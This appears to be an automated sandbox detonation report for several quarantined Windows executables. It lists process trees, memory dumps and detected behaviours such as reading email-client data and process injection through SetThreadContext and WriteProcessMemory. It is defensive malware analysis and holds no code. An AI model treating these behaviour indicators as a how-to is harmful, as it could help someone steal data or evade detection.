"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4912 /prefetch:2
Network
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
\??\pipe\LOCAL\crashpad_5092_WVNZWYKNJEBNBCPS
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"
Network
Files
memory/2528-0-0x000000013F7D0000-0x000000013F97E000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Reads user/profile data of local email clients
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4500 set thread context of 4876 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4500 -ip 4500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 776
Network
Files
memory/4500-0-0x0000000074D7E000-0x0000000074D7F000-memory.dmp
memory/4500-1-0x0000000000DE0000-0x0000000000E48000-memory.dmp
memory/4500-2-0x0000000005CC0000-0x0000000006264000-memory.dmp
memory/4876-4-0x0000000000400000-0x000000000045E000-memory.dmp
memory/4876-6-0x0000000000400000-0x000000000045E000-memory.dmp
memory/4500-7-0x0000000074D70000-0x0000000075520000-memory.dmp
memory/4876-8-0x0000000000400000-0x000000000045E000-memory.dmp
memory/4876-9-0x0000000000400000-0x000000000045E000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
100s
Max time network
149s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
